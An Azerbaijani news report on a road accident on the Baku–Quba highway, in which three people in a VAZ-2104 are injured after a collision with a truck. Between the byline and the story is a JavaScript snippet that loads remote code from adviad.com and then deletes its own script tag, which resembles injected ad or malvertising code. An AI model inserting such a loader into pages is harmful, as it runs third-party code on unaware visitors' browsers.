Bakı-Quba yolunda QƏZA: Xəsarət alanlar var

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Bakı-Quba yolunda yol-nəqliyyat hadisəsi baş verib.

APA-nın məlumatına görə, qəza magistralın 77-ci km-də qeydə alınıb.

Siyəzən rayonu, Zarat kənd sakini 1979-cu il təvəllüdlü Hüseynov Ramin Əjdər oğlunun idarə etdiyi “VAZ-2104” markalı nəqliyyat vasitəsilə Ucar rayon sakini 1983-cü il təvəllüdlü Əliyev Sadiq Fikrət oğlunun idarə etdiyi yük maşını toqquşub.

Hadisə nəticəsində “VAZ-2104”ün sürücüsü Ramin Hüseynov, minik maşınının sərnişinləri – Siyəzən rayon sakinləri 1953-cü il təvəllüdlü Firdudin Abbasov və 1984-cü il təvəllüdlü Əli Eldarov xəsarət alıb.

Faktla bağlı araşdırmalar davam etdirilir.

Oxu.az

Bu yazılara da göz atın...